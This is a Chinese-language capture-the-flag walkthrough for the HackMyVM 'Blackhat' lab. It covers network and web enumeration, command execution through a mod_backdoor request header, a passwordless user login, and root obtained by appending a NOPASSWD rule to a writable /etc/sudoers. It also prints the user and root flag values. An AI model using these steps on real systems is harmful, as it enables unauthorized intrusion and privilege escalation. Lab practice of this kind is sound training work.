HackMyVM Blackhat
信息收集
root@kali:~# arp-scan --localnet -I eth0
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d8:ab:ac, IPv4: 192.168.100.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1 bc:24:11:b4:12:2d (Unknown)
192.168.100.2 bc:24:11:a2:5b:a7 (Unknown)
192.168.100.3 00:e0:4f:25:79:40 Cisco Systems, Inc
192.168.100.10 90:09:d0:24:84:21 Synology Incorporated
192.168.100.11 c8:98:28:3e:45:5b (Unknown)
192.168.100.12 c8:98:28:3e:49:9d (Unknown)
192.168.100.53 98:8f:e0:6b:01:94 Huaqin Technology Co.,Ltd.
192.168.100.53 98:8f:e0:6b:01:94 Huaqin Technology Co.,Ltd. (DUP: 2)
192.168.100.54 08:00:27:c4:74:2a PCS Systemtechnik GmbH
192.168.100.52 ae:b9:07:ec:8e:76 (Unknown: locally administered)
192.168.100.51 54:48:e6:cb:25:c9 Beijing Xiaomi Mobile Software Co., Ltd
14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.026 seconds (126.36 hosts/sec). 10 responded端口扫描
root@kali:~# nmap 192.168.100.54 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-05 14:43 EDT
Nmap scan report for 192.168.100.54
Host is up (0.00078s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:C4:74:2A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 6.40 seconds80端口:
目录枚举
root@kali:~# gobuster dir -x php,txt,html,js -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.54
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.54
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 1437]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/phpinfo.php (Status: 200) [Size: 69344]
/server-status (Status: 403) [Size: 279]
Progress: 1102795 / 1102800 (100.00%)有一个phpinfo.php 暂时未发现什么东西
在 index.html 中发现一行被display:none 的标签
check backdoor 指定是有什么后门 不知道在哪里
扫过 web GET 参数啥都没扫到
最后在 phpinfo 中搜了一下 backdoor 发现 加载了一个mod_backdoor
查询这个模块后发现只需要在请求头中加入Backdoor: id 就可以进行命令执行了
GetShell
User提权
找了很久都没有找到提权点
但是跑了一遍linpeas.sh 发现了
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls
# file: /etc/sudoers
USER root r--
user darkdante rw-
GROUP root r--
mask rw-
other ---
darkdante可以写sudoers文件 ,拿到user就能秒root了
没有任何提权点, 那只可能是弱口令
结果一试,这用户根本没有密码 直接就登上去了...
UserFlag
darkdante@blackhat:~$ cat user.txt
89fac491dc9bdc5fc4e3595dd396fb11Root提权
刚刚跑到了sudoers可写, 直接写
darkdante@blackhat:~$ ls -al /etc/sudoers
-r--rw----+ 1 root root 669 Nov 19 2022 /etc/sudoersecho 'darkdante ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoersdarkdante@blackhat:~$ sudo -l
Matching Defaults entries for darkdante on blackhat:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User darkdante may run the following commands on blackhat:
(ALL) NOPASSWD: ALL
darkdante@blackhat:~$ sudo bash
root@blackhat:/home/darkdante# id
uid=0(root) gid=0(root) groups=0(root)
root@blackhat:/home/darkdante#就完了
RootFlag
root@blackhat:~# cat root.txt
8cc6110bc1a0607015c354a459468442